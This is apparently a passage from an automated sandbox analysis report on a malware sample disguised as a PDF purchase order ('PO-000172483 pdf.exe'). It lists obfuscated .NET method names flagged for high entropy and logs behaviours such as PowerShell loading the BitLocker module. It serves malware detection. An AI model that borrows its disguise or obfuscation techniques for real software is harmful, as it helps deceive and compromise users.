Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, lT70L1CXqUrvdcopF3.cs	High entropy of concatenated method names: 'GXbet3iA0g', 'YcTeHmvNyW', 'M3de2vLitP', 'QtgeKHfc6P', 'PESeqVCxYw', 'Ljhe7X84i2', 'J9pemYmPBM', 'CUUeOTYjR0', 'ELeeRLD3sP', 'ySbe1kUsb3'
Source: 0.2.PO-000172483 pdf.exe.4062da0.2.raw.unpack, SJhag4Qv1rAc4cOAvG.cs	High entropy of concatenated method names: 'Dispose', 'QodITWlLFH', 'R4J3KyyxcX', 'gwU24FW7kb', 'w5RIpGXlKX', 'dfBIzT6S3A', 'ProcessDialogKey', 'CIj3NHHPgx', 'rQX3IlKY4I', 'cle337cnJh'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, vsEvR6jZkKPkGcvXL6.cs	High entropy of concatenated method names: 'gxOPYd5mLi', 'ilcPp1Go1b', 'JCAuNKpNAe', 'huduIRALR2', 'Hy2P1n0iH9', 'WsnPVMMD4Q', 'YuDPCGpkGG', 'BVlPJ4RyJY', 'un1PSnZB6D', 'dixP4ibjK1'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, rjGXLiIIsHKKl4gGXDP.cs	High entropy of concatenated method names: 'B5AbpxseXU', 'z8AbzWOhSd', 'EtDwN3Xogn', 'VhtwI7kbTa', 'N4Fw3xtVIO', 'OTfwyjd1lu', 'cyEw58SrkN', 'X6Uwc7b5PB', 'BcTwDCOjWJ', 'SNtwQnS7iJ'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, VhESNQ93BhEjTS9KbF.cs	High entropy of concatenated method names: 'qHHG47PnFj', 'Ed3GBRcOp1', 'uJLGoegj9e', 'ToString', 'dgyGjlTUtF', 'd2mGsKlPUR', 'gEpgZrBnSBpUXPqj75h', 'Sp0ZsrBvIa9hAD2yGQn', 'B26B9FBF7BsiHQIdCxa', 'zR0iqfBIABVO1hqn4Jf'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, nWNouE3XTCsmn8AWLg.cs	High entropy of concatenated method names: 'mjLiYB4Lc', 'U5fAyIMlg', 'XhCMP5H0h', 'dLZxiiheZ', 'QTMHmxlEa', 'djVUJwI3S', 'XaZZXZp8Ls0yot9ad3', 'ELEMlwMZReFok5jFc8', 'iFIuV7JEk', 'NMEbrEd14'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RljNRwvexVjjsB76UM.cs	High entropy of concatenated method names: 'RcYycuTHAc', 'L1fyDg9bQO', 'LnUyQxp554', 'Ae1ydIlDNe', 'a51yXX2tbX', 'wC6yG0AsWa', 'OIZylvV0AB', 'kNYyvqhSuF', 'egJyfY2qO1', 'PYOyWZTVk9'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, FgTnQAdFyMvgTUHRsm.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KOs3TVOkH3', 'x3H3pn7fjI', 'yLA3z6mY4t', 'aH5yNWcmmU', 'myeyITsSPN', 'pjhy378R9k', 'qM3yydKfUb', 'JuJC18V9lLJKLuXwZsq'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, qwQPRosefCodWlLFHk.cs	High entropy of concatenated method names: 'jHwrENjjC4', 'b2MrPBcmyG', 'mfcrrnkyw5', 'Pygrwinto8', 'inhrnrQnj8', 'gZFrkDlAUt', 'Dispose', 't13uDdCvXY', 'YNbuQKpr44', 'eUrudMZXZC'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, lyQmHtBFGgNcbIr078.cs	High entropy of concatenated method names: 'YLaPWIxeqv', 'oAtPaaF7oG', 'ToString', 'qIRPDJg3oY', 'pvtPQQ71IF', 'nmDPdrFSQx', 'IfHPXTxfgh', 'hZKPGvp3Qk', 'genPlAggyO', 'vgHPvlD3ya'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, I85skGI5ZfRyxjGkllF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sV2ZrIC221', 'CqRZbZJnj1', 'HCbZwblbvU', 'Vj4ZZOdN39', 'GkNZnkmcU4', 'eNvZF6Z42I', 't9BZkudI5R'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, zRjApUmse4aRdkDYIQ.cs	High entropy of concatenated method names: 'n6hlDw6Bhb', 'kMhldPI3Ov', 'in1lGMpsDR', 'jqKGpnD4JN', 'V72Gzn7yOg', 'CXTlNZGoRS', 'owKlIdUC3K', 'AxTl3W4yut', 'FFnlyUQMEj', 'q2il5mpsXe'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, aQOZCAHVvQwbZinXgB.cs	High entropy of concatenated method names: 'jZQdAbaQDP', 'N0vdMmKgGW', 'P0adtGuteG', 'hd4dHpttsq', 'eEbdEJdFEG', 'D1ud66V9LX', 'aTBdP3mr8c', 'E86duWK9yC', 'BOtdrCapQ4', 'FOZdbcbO0S'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, ioLwrm02KMeIjI7Ge4.cs	High entropy of concatenated method names: 'HLqlLwW9W0', 't79l81j1k2', 'fZRli7tnFU', 'Nq7lAJRVcF', 'OdVlgkCCaX', 'DdflMBcks7', 'taDlxgty4p', 'DBLltfVtKu', 'oWJlHiby6P', 'VyllUX4ZJ2'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, EkJkBftVd1N6EZjRuG.cs	High entropy of concatenated method names: 'M8AQJHhV36', 'GueQS4ZqXj', 'R29Q4TPcJV', 'rbsQB0ER2O', 'aerQoT3v9Q', 'KhOQjqXXWB', 'jNEQs4cWWn', 'y59QYlq6BA', 'fhNQTTLHvn', 'DyBQpgr1a6'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, VHHPgxTuQXlKY4I3le.cs	High entropy of concatenated method names: 'Qlvr2X446I', 'b2YrKHbZKm', 'pKCrhJXsPO', 'vRrrq1RS9k', 'Jpcr7nd3yr', 'WNMr9dLoan', 'ygormuYasg', 'QP0rOlrUp7', 'LZUr0ZiQ70', 'lAvrRDjGgj'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, Ixg4fAJMxepwcldWRO.cs	High entropy of concatenated method names: 'qhvERIiLZ0', 'OPqEV9DNKF', 'r35EJM1Kyj', 'YYjES3ZoSk', 'd4KEKE8Smq', 'jjiEhftuEZ', 'G0MEqScxeU', 'DdPE79Z7Eo', 'bX6E9VSPOR', 'eAYEmw7vR3'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, tlPgpnK3prN56VCpEH.cs	High entropy of concatenated method names: 'fb0SyNBHpNVKv1agdtK', 'Ciw6THBdhaNkhgfQ5o0', 'cnFGur0Kjf', 'wWYGrjC0qA', 'oTZGbFZd7m', 'MPXGdkBxosD23nImm9h', 'v2DYjGBUc0dR0QT5Pvc'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, YwqoPa4eWSsW8Wr9Lf.cs	High entropy of concatenated method names: 'ToString', 'WBt61q9uZG', 'zV56KZECFr', 'nfe6hfpGdE', 'x496qfWTnJ', 'cuO67Q8GF0', 'tUR69ApSro', 'wck6mhJB2f', 'oKx6OnoLAq', 'sYa6064cMs'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, dnRnq02WMNGAB1E7yE.cs	High entropy of concatenated method names: 'v0TGcpEl9N', 'C2RGQxw2s1', 'Vy9GXMc6NQ', 'xMAGlBCrbn', 'dqhGvmsSd9', 'pJcXojwuq2', 'D66XjLiJEw', 'SJGXs6dAPm', 'TncXYWK9p5', 'SKsXTYwbJy'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, YPrkuAU9X24lRFDp55.cs	High entropy of concatenated method names: 'jGRXgVoa5w', 'oTfXxdvVqi', 'AGNdhvb5g6', 'Pa1dqgUQlR', 'yJ5d7R5SpE', 'yytd95sNux', 'jQ1dmPtGZI', 'kkUdOTykNa', 'LUZd0fvIkZ', 'b4fdRaWUC6'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, RmXQHeINsPOf6wgDmHe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vXXb1kUZ2G', 'SBJbVxEMfc', 'te9bCZQxvj', 'jY4bJVf1Aa', 'hTqbSXfuIl', 'jj2b4uIbX9', 'K4ebB5Dwhg'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, twJNAFzFy9bNoHRTlO.cs	High entropy of concatenated method names: 'As5bMS3ad1', 'BSkbtaL636', 'FP7bHl9Hsd', 'X3jb290FYw', 'UmZbKPh1fu', 'W04bqPNTgy', 'Gs8b7mVlfU', 'EHnbk9UPXb', 'w2dbLCaG5g', 'hptb8xE6PL'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, uhh4Fg5JMtYB1LxfUY.cs	High entropy of concatenated method names: 'rtHIlkJkBf', 'Pd1IvN6EZj', 'AVvIWQwbZi', 'vXgIaBpPrk', 'vDpIE555nR', 'vq0I6WMNGA', 'E15Wl6f90rjhICv1YJ', 'pZLDM2ipp7VWJ6Guin', 'APoIIJoqkN', 'W4mIy9ugIu'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, lT70L1CXqUrvdcopF3.cs	High entropy of concatenated method names: 'GXbet3iA0g', 'YcTeHmvNyW', 'M3de2vLitP', 'QtgeKHfc6P', 'PESeqVCxYw', 'Ljhe7X84i2', 'J9pemYmPBM', 'CUUeOTYjR0', 'ELeeRLD3sP', 'ySbe1kUsb3'
Source: 0.2.PO-000172483 pdf.exe.40ed7c0.1.raw.unpack, SJhag4Qv1rAc4cOAvG.cs	High entropy of concatenated method names: 'Dispose', 'QodITWlLFH', 'R4J3KyyxcX', 'gwU24FW7kb', 'w5RIpGXlKX', 'dfBIzT6S3A', 'ProcessDialogKey', 'CIj3NHHPgx', 'rQX3IlKY4I', 'cle337cnJh'
Source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.PO-000172483 pdf.exe.3dd70b8.4.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, vsEvR6jZkKPkGcvXL6.cs	High entropy of concatenated method names: 'gxOPYd5mLi', 'ilcPp1Go1b', 'JCAuNKpNAe', 'huduIRALR2', 'Hy2P1n0iH9', 'WsnPVMMD4Q', 'YuDPCGpkGG', 'BVlPJ4RyJY', 'un1PSnZB6D', 'dixP4ibjK1'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, rjGXLiIIsHKKl4gGXDP.cs	High entropy of concatenated method names: 'B5AbpxseXU', 'z8AbzWOhSd', 'EtDwN3Xogn', 'VhtwI7kbTa', 'N4Fw3xtVIO', 'OTfwyjd1lu', 'cyEw58SrkN', 'X6Uwc7b5PB', 'BcTwDCOjWJ', 'SNtwQnS7iJ'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, VhESNQ93BhEjTS9KbF.cs	High entropy of concatenated method names: 'qHHG47PnFj', 'Ed3GBRcOp1', 'uJLGoegj9e', 'ToString', 'dgyGjlTUtF', 'd2mGsKlPUR', 'gEpgZrBnSBpUXPqj75h', 'Sp0ZsrBvIa9hAD2yGQn', 'B26B9FBF7BsiHQIdCxa', 'zR0iqfBIABVO1hqn4Jf'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, nWNouE3XTCsmn8AWLg.cs	High entropy of concatenated method names: 'mjLiYB4Lc', 'U5fAyIMlg', 'XhCMP5H0h', 'dLZxiiheZ', 'QTMHmxlEa', 'djVUJwI3S', 'XaZZXZp8Ls0yot9ad3', 'ELEMlwMZReFok5jFc8', 'iFIuV7JEk', 'NMEbrEd14'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RljNRwvexVjjsB76UM.cs	High entropy of concatenated method names: 'RcYycuTHAc', 'L1fyDg9bQO', 'LnUyQxp554', 'Ae1ydIlDNe', 'a51yXX2tbX', 'wC6yG0AsWa', 'OIZylvV0AB', 'kNYyvqhSuF', 'egJyfY2qO1', 'PYOyWZTVk9'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, FgTnQAdFyMvgTUHRsm.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KOs3TVOkH3', 'x3H3pn7fjI', 'yLA3z6mY4t', 'aH5yNWcmmU', 'myeyITsSPN', 'pjhy378R9k', 'qM3yydKfUb', 'JuJC18V9lLJKLuXwZsq'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, qwQPRosefCodWlLFHk.cs	High entropy of concatenated method names: 'jHwrENjjC4', 'b2MrPBcmyG', 'mfcrrnkyw5', 'Pygrwinto8', 'inhrnrQnj8', 'gZFrkDlAUt', 'Dispose', 't13uDdCvXY', 'YNbuQKpr44', 'eUrudMZXZC'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, lyQmHtBFGgNcbIr078.cs	High entropy of concatenated method names: 'YLaPWIxeqv', 'oAtPaaF7oG', 'ToString', 'qIRPDJg3oY', 'pvtPQQ71IF', 'nmDPdrFSQx', 'IfHPXTxfgh', 'hZKPGvp3Qk', 'genPlAggyO', 'vgHPvlD3ya'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, I85skGI5ZfRyxjGkllF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sV2ZrIC221', 'CqRZbZJnj1', 'HCbZwblbvU', 'Vj4ZZOdN39', 'GkNZnkmcU4', 'eNvZF6Z42I', 't9BZkudI5R'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, zRjApUmse4aRdkDYIQ.cs	High entropy of concatenated method names: 'n6hlDw6Bhb', 'kMhldPI3Ov', 'in1lGMpsDR', 'jqKGpnD4JN', 'V72Gzn7yOg', 'CXTlNZGoRS', 'owKlIdUC3K', 'AxTl3W4yut', 'FFnlyUQMEj', 'q2il5mpsXe'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, aQOZCAHVvQwbZinXgB.cs	High entropy of concatenated method names: 'jZQdAbaQDP', 'N0vdMmKgGW', 'P0adtGuteG', 'hd4dHpttsq', 'eEbdEJdFEG', 'D1ud66V9LX', 'aTBdP3mr8c', 'E86duWK9yC', 'BOtdrCapQ4', 'FOZdbcbO0S'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, ioLwrm02KMeIjI7Ge4.cs	High entropy of concatenated method names: 'HLqlLwW9W0', 't79l81j1k2', 'fZRli7tnFU', 'Nq7lAJRVcF', 'OdVlgkCCaX', 'DdflMBcks7', 'taDlxgty4p', 'DBLltfVtKu', 'oWJlHiby6P', 'VyllUX4ZJ2'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, EkJkBftVd1N6EZjRuG.cs	High entropy of concatenated method names: 'M8AQJHhV36', 'GueQS4ZqXj', 'R29Q4TPcJV', 'rbsQB0ER2O', 'aerQoT3v9Q', 'KhOQjqXXWB', 'jNEQs4cWWn', 'y59QYlq6BA', 'fhNQTTLHvn', 'DyBQpgr1a6'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, VHHPgxTuQXlKY4I3le.cs	High entropy of concatenated method names: 'Qlvr2X446I', 'b2YrKHbZKm', 'pKCrhJXsPO', 'vRrrq1RS9k', 'Jpcr7nd3yr', 'WNMr9dLoan', 'ygormuYasg', 'QP0rOlrUp7', 'LZUr0ZiQ70', 'lAvrRDjGgj'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, Ixg4fAJMxepwcldWRO.cs	High entropy of concatenated method names: 'qhvERIiLZ0', 'OPqEV9DNKF', 'r35EJM1Kyj', 'YYjES3ZoSk', 'd4KEKE8Smq', 'jjiEhftuEZ', 'G0MEqScxeU', 'DdPE79Z7Eo', 'bX6E9VSPOR', 'eAYEmw7vR3'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, tlPgpnK3prN56VCpEH.cs	High entropy of concatenated method names: 'fb0SyNBHpNVKv1agdtK', 'Ciw6THBdhaNkhgfQ5o0', 'cnFGur0Kjf', 'wWYGrjC0qA', 'oTZGbFZd7m', 'MPXGdkBxosD23nImm9h', 'v2DYjGBUc0dR0QT5Pvc'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, YwqoPa4eWSsW8Wr9Lf.cs	High entropy of concatenated method names: 'ToString', 'WBt61q9uZG', 'zV56KZECFr', 'nfe6hfpGdE', 'x496qfWTnJ', 'cuO67Q8GF0', 'tUR69ApSro', 'wck6mhJB2f', 'oKx6OnoLAq', 'sYa6064cMs'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, dnRnq02WMNGAB1E7yE.cs	High entropy of concatenated method names: 'v0TGcpEl9N', 'C2RGQxw2s1', 'Vy9GXMc6NQ', 'xMAGlBCrbn', 'dqhGvmsSd9', 'pJcXojwuq2', 'D66XjLiJEw', 'SJGXs6dAPm', 'TncXYWK9p5', 'SKsXTYwbJy'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, YPrkuAU9X24lRFDp55.cs	High entropy of concatenated method names: 'jGRXgVoa5w', 'oTfXxdvVqi', 'AGNdhvb5g6', 'Pa1dqgUQlR', 'yJ5d7R5SpE', 'yytd95sNux', 'jQ1dmPtGZI', 'kkUdOTykNa', 'LUZd0fvIkZ', 'b4fdRaWUC6'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, RmXQHeINsPOf6wgDmHe.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vXXb1kUZ2G', 'SBJbVxEMfc', 'te9bCZQxvj', 'jY4bJVf1Aa', 'hTqbSXfuIl', 'jj2b4uIbX9', 'K4ebB5Dwhg'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, twJNAFzFy9bNoHRTlO.cs	High entropy of concatenated method names: 'As5bMS3ad1', 'BSkbtaL636', 'FP7bHl9Hsd', 'X3jb290FYw', 'UmZbKPh1fu', 'W04bqPNTgy', 'Gs8b7mVlfU', 'EHnbk9UPXb', 'w2dbLCaG5g', 'hptb8xE6PL'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, uhh4Fg5JMtYB1LxfUY.cs	High entropy of concatenated method names: 'rtHIlkJkBf', 'Pd1IvN6EZj', 'AVvIWQwbZi', 'vXgIaBpPrk', 'vDpIE555nR', 'vq0I6WMNGA', 'E15Wl6f90rjhICv1YJ', 'pZLDM2ipp7VWJ6Guin', 'APoIIJoqkN', 'W4mIy9ugIu'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, lT70L1CXqUrvdcopF3.cs	High entropy of concatenated method names: 'GXbet3iA0g', 'YcTeHmvNyW', 'M3de2vLitP', 'QtgeKHfc6P', 'PESeqVCxYw', 'Ljhe7X84i2', 'J9pemYmPBM', 'CUUeOTYjR0', 'ELeeRLD3sP', 'ySbe1kUsb3'
Source: 0.2.PO-000172483 pdf.exe.c920000.6.raw.unpack, SJhag4Qv1rAc4cOAvG.cs	High entropy of concatenated method names: 'Dispose', 'QodITWlLFH', 'R4J3KyyxcX', 'gwU24FW7kb', 'w5RIpGXlKX', 'dfBIzT6S3A', 'ProcessDialogKey', 'CIj3NHHPgx', 'rQX3IlKY4I', 'cle337cnJh'
Source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.PO-000172483 pdf.exe.8fb0000.5.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.PO-000172483 pdf.exe.3db7098.3.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
